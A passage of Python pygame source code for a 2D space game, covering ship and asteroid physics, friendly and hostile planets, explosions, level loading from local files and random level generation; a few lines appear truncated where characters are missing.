self.changeTrajectory=True\r\n self.mineralCount=0\r\n self.fuel=10\r\n self.explosionFramesCount=0\r\n self.finishFramesCount=0\r\n self.finish=False\r\n\r\n # defines initial rotation characteristics of battle ship\r\n # all angular measures are in radians\r\n self.angle=float(0)\r\n # initial rotation\r\n self.Surf = pygame.Surface((shipWidth, shipHeight))\r\n self.Surf.blit(playerImg, (0,0))\r\n self.rotSurf = pygame.transform.rotate(self.Surf, math.degrees(self.angle)-90)\r\n self.rotSurf.set_colorkey(BLACK) \r\n \r\n self.image=self.rotSurf\r\n self.rect=self.rotSurf.get_rect().move(self.position.x-self.rotSurf.get_rect().width/2, self.position.y-self.rotSurf.get_rect().height/2)\r\n self.mask=pygame.mask.from_surface(self.Surf) #create mask for collision\r\n\r\n #calculate coordinates of asteroid catcher\r\n self.catcherCenter=vecSum(vector((math.cos(self.angle)*(shipHeight/2.0+self.catcherRadius), -math.sin(self.angle)*(shipHeight/2.0+self.catcherRadius))), self.position)\r\n\r\n def update(self, force, asteroidBelt):\r\n if self.alive and not self.finish:\r\n if self.onOrbit==False:\r\n #update Cartesian position\r\n # first update position, then - speed and finally - acceleration\r\n 
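# i.e. x += v*dt + F*dt^2/2, then v += speedDelta (engine input) + F*dt; the force is used directly as acceleration, so unit ship mass is apparently assumed\r\n 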
self.position=vecSum(self.position,vecSum(multSc(deltaT, self.speed), multSc(math.pow(deltaT, 2)/2, force)))\r\n self.speed=vecSum(self.speed, vecSum(self.speedDelta, multSc(deltaT,force)))\r\n self.acc=force \r\n #update rotation\r\n # first update angle, then rotation\r\n self.angle+=deltaT*self.angleDelta\r\n if self.angle>(2*math.pi): self.angle=self.angle%(2*math.pi)\r\n else:\r\n #when ship moves on friendly's planet orbit speed and rotation are used in absolute terms\r\n self.position=vecSum(self.position, multSc(deltaT, self.speedDelta))\r\n self.speed=self.speedDelta\r\n self.angle+=deltaT*self.angleDelta\r\n if self.angle>(2*math.pi): self.angle=self.angle%(2*math.pi)\r\n\r\n #calculate caught asteroids movements and asteroid catch\r\n\r\n if self.asteroidCaught!=None and self.catcherOn==True:\r\n self.asteroidCatch(self.asteroidCaught)\r\n elif self.asteroidCaught!=None and self.catcherOn==False:\r\n self.asteroidPush(self.asteroidCaught)\r\n self.asteroidCaught=None\r\n elif self.asteroidCaught==None and self.catcherOn==True:\r\n distanceToNearest=self.catcherRadius\r\n for i in asteroidBelt:\r\n if vecMag(vecDif(self.catcherCenter, i.position))=FPS:\r\n pygame.sprite.Sprite.kill(self)\r\n #if player finished the level launch finish animation\r\n elif self.finish:\r\n animationFrames=5\r\n numberOfPicture=self.finishFramesCount//animationFrames\r\n self.Surf.fill(BLACK)\r\n self.Surf.blit(finishAnimation[numberOfPicture], (0, 0))\r\n self.Surf.set_colorkey(BLACK)\r\n self.image=self.Surf\r\n self.rect=self.Surf.get_rect().move(self.position.x-self.Surf.get_rect().width/2, self.position.y-self.Surf.get_rect().height/2)\r\n self.finishFramesCount+=1\r\n if self.finishFramesCount>=FPS:\r\n pygame.sprite.Sprite.kill(self)\r\n\r\n def asteroidCatch(self, other): \r\n #returns the speed to the catched object\r\n if self.catcherCenter==other.position:\r\n other.speed=self.speed\r\n elif vecMag(vecDif(self.catcherCenter, other.position))>maxInCatcherSpeed:\r\n speedDirection=multSc(1.0/vecMag(vecDif(self.catcherCenter, other.position)),vecDif(self.catcherCenter, other.position))\r\n other.speed=vecSum(self.speed, multSc(maxInCatcherSpeed, speedDirection))\r\n elif vecMag(vecDif(self.catcherCenter, other.position))<=maxInCatcherSpeed:\r\n other.speed=vecSum(self.speed, vecDif(self.catcherCenter, other.position))\r\n \r\n def asteroidPush(self, other):\r\n #catcher push in the direction of the player's ship with additional speed of speedCatcherPush in magnitude\r\n other.speed=multSc(speedCatcherPush, vector((math.cos(self.angle), -math.sin(self.angle)))) \r\n\r\n def engineFlames(self):\r\n # function is to add flames to ship image\r\n self.Surf = pygame.Surface((shipWidth, shipHeight))\r\n #self.Surf.blit(playerImg, (0, 0))\r\n if self.mainEngine==True:\r\n if self.leftShuntingEngine==True:\r\n if self.rightShuntingEngine==True:\r\n self.Surf.blit(mainLeftRightShuntingEngineImg, (0, 0))\r\n self.fuel-=(engineConsumption+2*shuntingEngineConsumption) \r\n else:\r\n self.Surf.blit(mainLeftShuntingEngineImg, (0, 0))\r\n self.fuel-=(engineConsumption+shuntingEngineConsumption)\r\n else:\r\n if self.rightShuntingEngine==True:\r\n self.Surf.blit(mainRightShuntingEngineImg, (0, 0))\r\n self.fuel-=(engineConsumption+shuntingEngineConsumption)\r\n else:\r\n self.Surf.blit(mainEngineImg, (0, 0))\r\n self.fuel-=engineConsumption \r\n else:\r\n if self.leftShuntingEngine==True:\r\n if self.rightShuntingEngine==True:\r\n self.Surf.blit(leftRightShuntingEngineImg, (0, 0))\r\n 
self.fuel-=2*shuntingEngineConsumption\r\n else:\r\n self.Surf.blit(leftShuntingEngineImg, (0, 0))\r\n self.fuel-=shuntingEngineConsumption\r\n else:\r\n if self.rightShuntingEngine==True:\r\n self.Surf.blit(rightShuntingEngineImg, (0, 0))\r\n self.fuel-=shuntingEngineConsumption\r\n else:\r\n self.Surf.blit(playerImg, (0, 0))\r\n #define function to check whether player collided with the borders\r\n def checkBorder(self):\r\n collidedBorder=False\r\n #for b in borders.sprites():\r\n # if pygame.sprite.collide_mask(b, self)!=None: collidedBorder=b.position\r\n if self.position.x>=WINDOWWIDTH:\r\n collidedBorder='Right'\r\n elif self.position.y>=WINDOWHEIGHT:\r\n collidedBorder='Bottom'\r\n elif self.position.x<=0:\r\n collidedBorder='Left'\r\n elif self.position.y<=0:\r\n collidedBorder='Top'\r\n\r\n return collidedBorder\r\n\r\n #define new function for ship's behavior after bounce\r\n def bounce(self, borderPosition):\r\n impedeFactor=2.0\r\n if borderPosition=='Left':\r\n self.speed=vector((abs(self.speed.x/impedeFactor), self.speed.y/impedeFactor))\r\n self.fuel-=navigateConsumption\r\n self.speedDelta=vector((0, 0))\r\n elif borderPosition=='Right':\r\n self.speed=vector((-abs(self.speed.x/impedeFactor), self.speed.y/impedeFactor))\r\n self.fuel-=navigateConsumption\r\n self.speedDelta=vector((0, 0))\r\n elif borderPosition=='Top':\r\n self.speed=vector((self.speed.x/impedeFactor, abs(self.speed.y/impedeFactor)))\r\n self.fuel-=navigateConsumption\r\n self.speedDelta=vector((0, 0))\r\n elif borderPosition=='Bottom':\r\n self.speed=vector((self.speed.x/impedeFactor, -abs(self.speed.y/impedeFactor)))\r\n self.fuel-=navigateConsumption\r\n self.speedDelta=vector((0, 0)) \r\n\r\n#function to calculate trajectory with given position, speed and acceleration, planetary system\r\ndef calcTrajectory(position, velocity, field, planetarySystem):\r\n traj=[]\r\n speed=[]\r\n totalForce=vector((0, 0))\r\n endOfTraj=False\r\n \r\n while not endOfTraj:\r\n traj.append(position)\r\n speed.append(velocity)\r\n #define sum of forces\r\n totalForce=field.getField(position)\r\n #define new position and speed\r\n if totalForce!=vector((0, 0)) or velocity!=vector((0, 0)):\r\n position=vecSum(position,vecSum(multSc(deltaT, velocity), multSc(math.pow(deltaT, 2)/2, totalForce)))\r\n velocity=vecSum(velocity, multSc(deltaT,totalForce))\r\n #check end of trajectory\r\n if position.x>=WINDOWWIDTH or position.y>=WINDOWHEIGHT or position.x<=0 or position.y<=0: endOfTraj=True\r\n #check for crash with the plant\r\n for i in planetarySystem.sprites(): #here i is iterable planet\r\n planetVec=i.position\r\n if vecMag(vecDif(position, planetVec))<=i.mass: endOfTraj=True \r\n #limit the number of calculated points\r\n if len(traj)>=3000: endOfTraj=True\r\n else: endOfTraj=True\r\n return zip(traj, speed)\r\n\r\nclass asteroid(pygame.sprite.Sprite):\r\n def __init__(self, position, speed, tailGroup): #position defines center of the planet and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n # set position and speed of the asteroid\r\n self.position=position\r\n self.speed=speed\r\n\r\n #set initial image of the asteroid\r\n self.surf=pygame.Surface((10, 10)) \r\n self.surf.blit(asteroidImg,(0,0))\r\n self.surf.set_colorkey(BLACK) \r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-5, position.y-5, 10, 10)\r\n\r\n self.tail=asteroidTail(self.position, self.speed)\r\n tailGroup.add(self.tail)\r\n\r\n def update(self, 
force, liveState):\r\n #update decartes position\r\n # first update position, then - speed \r\n self.position=vecSum(self.position,vecSum(multSc(deltaT, self.speed), multSc(math.pow(deltaT, 2)/2, force)))\r\n self.speed=vecSum(self.speed, multSc(deltaT,force)) \r\n #update image\r\n self.rect=pygame.Rect(self.position.x-5, self.position.y-5, 10, 10)\r\n self.tail.update(self.position, self.speed)\r\n\r\n #check whether the ship is collided\r\n if liveState==False: self.kill()\r\n\r\n def smashAsteroids(self, other, explosionGroup):\r\n explosionCenter=vecSum(self.position, multSc(vecMag(vecDif(self.position, other.position))/2.0, unitVec(vecDif(other.position, self.position))))\r\n explosionGroup.add(explosion(explosionCenter))\r\n if isinstance(other, asteroid):\r\n self.kill()\r\n other.kill()\r\n self.tail.kill()\r\n\r\n def kill(self):\r\n pygame.sprite.Sprite.kill(self)\r\n self.tail.kill() \r\n\r\nclass asteroidTail(pygame.sprite.Sprite):\r\n def __init__(self, astPosition, speed): #position given for tail is the center of its asteroid\r\n pygame.sprite.Sprite.__init__(self)\r\n # set position and speed of the asteroid\r\n self.speed=speed\r\n self.angle=multSc(-1, self.speed).getAngle()\r\n self.position=vecSum(astPosition, multSc(7, unitVec(multSc(-1, self.speed))))\r\n\r\n #set an image of the tial\r\n self.surf=pygame.Surface((10, 15)) \r\n self.surf.blit(asteroidTailImg,(0,0))\r\n self.rotSurf = pygame.transform.rotate(self.surf, math.degrees(self.angle)-90)\r\n self.rotSurf.set_colorkey(BLACK) \r\n \r\n self.image=self.rotSurf\r\n self.rect=self.rotSurf.get_rect().move(self.position.x-self.rotSurf.get_rect().width/2, self.position.y-self.rotSurf.get_rect().height/2)\r\n\r\n def update(self, astPosition, speed):\r\n\r\n self.speed=speed\r\n self.angle=multSc(-1, self.speed).getAngle()\r\n self.position=vecSum(astPosition, multSc(7, unitVec(multSc(-1, self.speed))))\r\n\r\n self.rotSurf = pygame.transform.rotate(self.surf, math.degrees(self.angle)-90)\r\n self.rotSurf.set_colorkey(BLACK) \r\n \r\n self.image=self.rotSurf\r\n self.rect=self.rotSurf.get_rect().move(self.position.x-self.rotSurf.get_rect().width/2, self.position.y-self.rotSurf.get_rect().height/2)\r\n \r\n\r\n# define planet class as sprite\r\nclass planet(pygame.sprite.Sprite):\r\n def __init__(self, mass, color, position): #position defines center of the planet and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n self.mass=mass #mass of the planet define gravity magnitude and radius\r\n self.color=color #color just for visualization\r\n self.position=position #position of the planet on screen\r\n self.surf=pygame.Surface((2*mass, 2*mass)) #surface of the planet\r\n self.surf.blit(neutPlanetImg, (0, 0))#draw a planet on planets' surface in center of the surface\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-mass, position.y-mass, 2*mass, 2*mass) # mass is subtracted use position as a center\r\n\r\n def update(self, other, plasmaGroup):\r\n pygame.sprite.Sprite.update(self)\r\n \r\n\r\nclass start(pygame.sprite.Sprite):\r\n def __init__(self, position): #position defines center of the start and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n self.position=position #position of the start on screen\r\n self.surf=pygame.Surface((20, 20)) #surface of the start\r\n self.surf.blit(startImg, (0, 0))\r\n self.surf.set_colorkey(BLACK) #set 
black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-10, position.y-10, 20, 20)\r\n\r\nclass finish(pygame.sprite.Sprite):\r\n def __init__(self, position): #position defines center of the start and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n self.active=False\r\n self.position=position #position of the start on screen\r\n self.surf=pygame.Surface((20, 20)) #surface of the start\r\n self.surf.blit(finishImg, (0, 0))\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-10, position.y-10, 20, 20)\r\n\r\n def activate(self):\r\n self.active=True\r\n self.surf.blit(finishActiveImg, (0, 0))\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n\r\nclass explosion(pygame.sprite.Sprite):\r\n def __init__(self, position): #position defines center of the explosion and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n self.explosionFramesCount=0\r\n self.explosionAnimation=explosions\r\n self.position=position\r\n self.Surf=pygame.Surface((16, 16))\r\n self.Surf.set_colorkey(BLACK)\r\n self.image=self.Surf\r\n self.rect=pygame.Rect(self.position.x-8, self.position.y-8, 16, 16)\r\n\r\n def update(self, mineralGroup):\r\n #number of frames for each animation picture\r\n animationFrames=5\r\n numberOfPicture=self.explosionFramesCount//animationFrames\r\n self.Surf.fill(BLACK)\r\n self.Surf.blit(self.explosionAnimation[numberOfPicture], (0, 0))\r\n self.image=self.Surf\r\n self.rect=pygame.Rect(self.position.x-8, self.position.y-8, 16, 16)\r\n self.explosionFramesCount+=1\r\n if self.explosionFramesCount>=FPS:\r\n mineralGroup.add(mineral(self.position))\r\n pygame.sprite.Sprite.kill(self)\r\n\r\n#define class of friendly planet\r\nclass frPlanet(planet):\r\n def __init__(self, mass, color, position):\r\n planet.__init__(self, mass, color, position)\r\n #set friendly planet orbit on planets radius plus 20\r\n self.surf=pygame.Surface((2*mass, 2*mass)) #surface of the planet\r\n self.surf.blit(frPlanetImg,(0,0))#draw a planet on planets' surface in center of the surface\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-mass, position.y-mass, 2*mass, 2*mass) # mass is subtracted use position as a center\r\n self.orbitRadius=float(mass+20)\r\n #define speed of ship on the orbit in number of turns over planet in one frame\r\n self.orbitalSpeed=1.0/(7.0*FPS)\r\n self.orbit=[]\r\n alpha=0\r\n for i in range(int(1/self.orbitalSpeed)):\r\n x=self.position.x+int(self.orbitRadius*math.cos(alpha))\r\n y=self.position.y-int(self.orbitRadius*math.sin(alpha))\r\n try:\r\n if self.orbit[len(self.orbit)-1]!=(x, y):\r\n self.orbit.append((x, y))\r\n except:\r\n self.orbit.append((self.position.x+int(self.orbitRadius), self.position.y))\r\n alpha+=2.0*math.pi*self.orbitalSpeed\r\n\r\n def takeOnOrbit(self, other):\r\n if isinstance(other, battleShip):\r\n deltaAngle=0.0\r\n other.onOrbit=True\r\n other.fuel=10\r\n #returns the list of three numbers: x speed of the ship, y speed of the ship, delta of the ship's angle\r\n #find nearest orbit's point\r\n if (int(other.position.x), int(other.position.y)) in self.orbit:\r\n 
point=self.orbit.index((int(other.position.x), int(other.position.y)))\r\n nextPoint=point+1\r\n if nextPoint>len(self.orbit)-1:\r\n nextPoint=nextPoint%len(self.orbit)\r\n xSpeed=self.orbit[nextPoint][0]-self.orbit[point][0]\r\n ySpeed=self.orbit[nextPoint][1]-self.orbit[point][1]\r\n else:\r\n nearestPoint=min(self.orbit, key=lambda i: math.pow(i[0]-other.position.x, 2)+math.pow(i[1]-other.position.y, 2))\r\n nextPoint=self.orbit.index(nearestPoint)\r\n xSpeed=self.orbit[nextPoint][0]-other.position.x\r\n ySpeed=self.orbit[nextPoint][1]-other.position.y\r\n other.speedDelta=vector((xSpeed, ySpeed))\r\n\r\n#define cless of foe planet\r\nclass foePlanet(planet):\r\n def __init__(self, mass, color, position, fireRadius):\r\n planet.__init__(self, mass, color, position)\r\n self.surf=pygame.Surface((2*mass, 2*mass)) #surface of the planet\r\n self.surf.blit(foePlanetImg,(0,0))#draw a planet on planets' surface in center of the surface\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-mass, position.y-mass, 2*mass, 2*mass) # mass is subtracted use position as a center\r\n #set fire radius\r\n self.fireRadius=(mass+fireRadius)\r\n #set shot interval as internal constant\r\n self.shotInterval=3*FPS\r\n self.timeFromLastShot=self.shotInterval\r\n\r\n def update(self, other, plasmaGroup):\r\n planet.update(self, other, plasmaGroup)\r\n if self.timeFromLastShot=0:\r\n game.playerShip.speedDelta=vecSum(game.playerShip.speedDelta, vector((engine*math.cos(game.playerShip.angle), -engine*math.sin(game.playerShip.angle))))#engines work and ship moves forward\r\n game.playerShip.mainEngine=True\r\n game.playerShip.onOrbit=False\r\n game.playerShip.changeTrajectory=True\r\n\r\n elif keys[pygame.K_RIGHT]!=0 and game.playerShip.fuel>=0:\r\n game.playerShip.angleDelta-=rotSpeed# left shunting engine is on and ship slightly rotates clockwise\r\n game.playerShip.leftShuntingEngine=True\r\n\r\n elif keys[pygame.K_LEFT]!=0 and game.playerShip.fuel>=0:\r\n game.playerShip.angleDelta+=rotSpeed# right shunting engine is on and ship slightly rotates counter-clockwise\r\n game.playerShip.rightShuntingEngine=True\r\n\r\n elif keys[pygame.K_SPACE]!=0 and previousKeys[pygame.K_SPACE]==0 and game.playerShip.fuel>=0:\r\n #if space is pushed asteroid catcher is on\r\n game.playerShip.catcherOn=not game.playerShip.catcherOn\r\n\r\n elif keys[pygame.K_PAUSE]!=0 and previousKeys[pygame.K_PAUSE]==0 and game.paused==False:\r\n game.paused=True\r\n\r\n elif game.gameMode.name in ['finish', 'death', 'main menu', 'finish random', 'training death', 'training finish', 'help', 'win', 'training win']:\r\n for event in pygame.event.get():\r\n if event.type==MOUSEBUTTONDOWN:\r\n game.mousePressed=pygame.mouse.get_pos()\r\n elif event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n#define a class of game mode\r\nclass mode():\r\n def __init__(self, name, buttons):\r\n self.name=name\r\n self.buttons=buttons\r\n\r\n#class that stores imformation on the game level\r\nclass level():\r\n def __init__(self, number, mode='campaign'):\r\n self.number=number\r\n self.startGroup=pygame.sprite.Group()\r\n self.finishGroup=pygame.sprite.Group()\r\n self.planetarySystem=pygame.sprite.Group()\r\n #set asteroids\r\n self.asteroidBelt=pygame.sprite.Group()\r\n self.tailGroup=pygame.sprite.Group()\r\n self.asteroidSpawnPoints=[]\r\n #set plasma\r\n 
self.plasmaShots=pygame.sprite.Group()\r\n #set explosions\r\n self.explosionGroup=pygame.sprite.Group()\r\n #set group of minerls sprites\r\n self.minerals=pygame.sprite.Group()\r\n self.load(self.number, mode)\r\n\r\n def load(self, number, mode='campaign'):\r\n self.number=number\r\n self.startGroup.empty()\r\n self.finishGroup.empty()\r\n self.planetarySystem.empty()\r\n self.asteroidBelt.empty()\r\n self.tailGroup.empty()\r\n self.plasmaShots.empty()\r\n self.explosionGroup.empty()\r\n self.minerals.empty()\r\n self.asteroidSpawnPoints=[]\r\n self.requiredMinerals=0\r\n self.pausedLabels=[]\r\n self.pausedLabels.append(label((280, 550),\"Press any key to resume game\", 30, 0, 0, 0, RED))\r\n self.winSituation=False\r\n self.trWinSituation=False\r\n levelLoaded=False\r\n if mode=='campaign':\r\n levelFile=open(\"levels\", \"r\")\r\n elif mode=='training':\r\n levelFile=open(\"trLevels\", \"r\")\r\n while not levelLoaded:\r\n strLevelNumber=''\r\n line=levelFile.readline().rstrip()\r\n if line=='':\r\n if mode=='campaign': self.winSituation=True\r\n elif mode=='training':\r\n self.trWinSituation=True\r\n break\r\n #check that we read needed level\r\n if line[0]=='#':\r\n for i in range(1, len(line)):\r\n strLevelNumber+=line[i]\r\n if strLevelNumber=='': strLevelNumber='0'\r\n if self.number==int(strLevelNumber):\r\n #read block of strings line by line with planet coordinates and other parameters\r\n while line[0]!='-':\r\n line=levelFile.readline().rstrip()\r\n if line=='planets':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n planetParams=line.split(' ')\r\n try:\r\n self.planetarySystem.add(planet(int(planetParams[2]), BLUE, vector((int(planetParams[0]), int(planetParams[1])))))\r\n except: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='frPlanets':\r\n line=levelFile.readline()\r\n while line!='.':\r\n planetParams=line.split(' ')\r\n try:\r\n self.planetarySystem.add(frPlanet(int(planetParams[2]), GREEN, vector((int(planetParams[0]), int(planetParams[1])))))\r\n except: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='foePlanets':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n planetParams=line.split(' ')\r\n try:\r\n self.planetarySystem.add(foePlanet(int(planetParams[2]), RED, vector((int(planetParams[0]), int(planetParams[1]))), int(planetParams[3])))\r\n except: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='asteroidSpawnPoints':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n try:\r\n self.asteroidSpawnPoints.append(asteroidSpawnSpot(vector((int(parameters[0]), int(parameters[1]))), vector((parameters[2], parameters[3])), int(parameters[4]), self.planetarySystem, self.asteroidBelt,\r\n self.tailGroup))\r\n except IndexError: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='minerals':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n try:\r\n self.minerals.add(mineral(vector((int(parameters[0]), int(parameters[1])))))\r\n except: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='required minerals':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n try:\r\n self.requiredMinerals=int(parameters[0])\r\n except: pass\r\n line=levelFile.readline().rstrip() \r\n elif line=='labels':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=[]\r\n if line[0]=='?': text=line[1:]\r\n else:\r\n parameters=line.split(' ')\r\n try:\r\n if 
parameters!=[]:\r\n self.pausedLabels.append(label((int(parameters[0]), int(parameters[1])), text, int(parameters[2]), int(parameters[3]), int(parameters[4]), int(parameters[5])))\r\n except IndexError: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='start':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n self.start=vector((int(parameters[0]), int(parameters[1])))\r\n self.startGroup.add(start(self.start))\r\n line=levelFile.readline().rstrip()\r\n elif line=='finish':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n self.finish=vector((int(parameters[0]), int(parameters[1])))\r\n self.finishGroup.add(finish(self.finish))\r\n line=levelFile.readline().rstrip()\r\n levelLoaded=True\r\n levelFile.close()\r\n #method to create random level\r\n def getRandom(self):\r\n random.seed()\r\n #clear current level\r\n self.startGroup.empty()\r\n self.finishGroup.empty()\r\n self.planetarySystem.empty()\r\n self.asteroidBelt.empty()\r\n self.tailGroup.empty()\r\n self.plasmaShots.empty()\r\n self.explosionGroup.empty()\r\n self.asteroidSpawnPoints=[]\r\n #set group of minerls sprites\r\n self.minerals=pygame.sprite.Group()\r\n self.requiredMinerals=0\r\n self.pausedLabels=[]\r\n\r\n #define the number of level objects\r\n numberPlanets=random.randint(1,7)\r\n numberFrPlanets=random.randint(1,3)\r\n numberFoePlanets=random.randint(1,3)\r\n numberAsteroidSpawnPoints=random.randint(1,3)\r\n\r\n #set loops controllers\r\n levelSet=False\r\n planetsSet=False\r\n frPlanetsSet=False\r\n foePlanetsSet=False\r\n asteroidSpawnSpotsSet=False\r\n startSet=False\r\n finishSet=False\r\n\r\n while not levelSet:\r\n #set planets\r\n i=0\r\n while not planetsSet:\r\n newMass=40\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n if self.planetarySystem.sprites()==[]:\r\n self.planetarySystem.add(planet(newMass, BLUE, newPosition))\r\n else:\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if vecMag(vecDif(newPosition, p.position))<=(newMass+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.planetarySystem.add(planet(newMass, BLUE, newPosition))\r\n i+=1\r\n if i==numberPlanets: planetsSet=True\r\n\r\n #set friendly planets\r\n i=0\r\n while not frPlanetsSet:\r\n newMass=40\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if isinstance(p, frPlanet) and vecMag(vecDif(newPosition, p.position))<=(newMass+20+p.orbitRadius):\r\n overlap+=1\r\n elif vecMag(vecDif(newPosition, p.position))<=(newMass+20+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.planetarySystem.add(frPlanet(newMass, GREEN, newPosition))\r\n i+=1\r\n if i==numberFrPlanets: frPlanetsSet=True\r\n\r\n #set foe planets\r\n i=0\r\n while not foePlanetsSet:\r\n newMass=40\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n newFireRadius=random.randint(20, 70)\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if isinstance(p, frPlanet) and vecMag(vecDif(newPosition, p.position))<=(newMass+p.orbitRadius):\r\n overlap+=1\r\n elif vecMag(vecDif(newPosition, p.position))<=(newMass+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.planetarySystem.add(foePlanet(newMass, RED, 
newPosition, newFireRadius))\r\n i+=1\r\n if i==numberFoePlanets: foePlanetsSet=True\r\n\r\n #set asteroid spawn spots\r\n i=0\r\n while not asteroidSpawnSpotsSet:\r\n #asteroid spawn spots are alonge the edges of the window\r\n newX=random.randint(5, WINDOWWIDTH-5)\r\n newY=random.randint(5, WINDOWHEIGHT-5)\r\n seq=((5, newY), (newX, 5), (WINDOWWIDTH-5, newY), (newX, WINDOWHEIGHT-5))\r\n newPosition=vector(random.choice(seq))\r\n #set direction of the asteroids speed\r\n if newPosition.x==5: newXSpeed=random.randint(1, 4)\r\n elif newPosition.x==WINDOWWIDTH-5: newXSpeed=random.randint(-4, -1)\r\n else: newXSpeed=random.randint(-4, 4)\r\n if newPosition.y==5: newYSpeed=random.randint(1, 4)\r\n elif newPosition.y==WINDOWHEIGHT-5: newYSpeed=random.randint(-4, -1)\r\n else: newYSpeed=random.randint(-4, 4)\r\n newSpeed=vector((newXSpeed, newYSpeed))\r\n #set asteroid interval\r\n newInterval=random.randint(10, 60)\r\n #add new asteroid spawn spot\r\n self.asteroidSpawnPoints.append(asteroidSpawnSpot(newPosition, newSpeed, newInterval, self.planetarySystem, self.asteroidBelt, self.tailGroup))\r\n i+=1\r\n if i==numberAsteroidSpawnPoints: asteroidSpawnSpotsSet=True\r\n\r\n #set start\r\n i=0\r\n while not startSet:\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if isinstance(p, frPlanet) and vecMag(vecDif(newPosition, p.position))<=(10+p.orbitRadius):\r\n overlap+=1\r\n elif vecMag(vecDif(newPosition, p.position))<=(10+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.startGroup.add(start(newPosition))\r\n self.start=newPosition\r\n i+=1\r\n if i==1: startSet=True\r\n\r\n #set finish\r\n i=0\r\n while not finishSet:\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if isinstance(p, frPlanet) and vecMag(vecDif(newPosition, p.position))<=(10+p.orbitRadius):\r\n overlap+=1\r\n elif vecMag(vecDif(newPosition, p.position))<=(10+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.finishGroup.add(finish(newPosition))\r\n self.finish=newPosition\r\n i+=1\r\n if i==1: finishSet=True\r\n levelSet=True\r\n\r\n#define a class with key game mechanics for each game mode\r\nclass game():\r\n def __init__(self, gameMode):\r\n self.gameMode=gameMode\r\n self.mousePressed=(0,0)\r\n self.paused=False\r\n self.deathClock=0 #this counts for 40 frames after each collision\r\n self.finishClock=0 #counts for 40 frames after finish moment \r\n\r\n def update(self, displaySurf):\r\n global currentLevelNumber\r\n if self.gameMode.name=='main menu':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Space adventures\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Space adventures\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n displaySurf.blit(mainMenuImg, (400-int(headTextWidth/2), 130-int(headTextHeight/2)))\r\n \r\n #draw main menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='NEW CAMPAIGN':\r\n currentLevelNumber=1\r\n self.currentLevel=level(1) \r\n self.changeMode(campaignMode)\r\n if b.text=='RESUME CAMPAIGN':\r\n self.currentLevel=level(currentLevelNumber)\r\n 
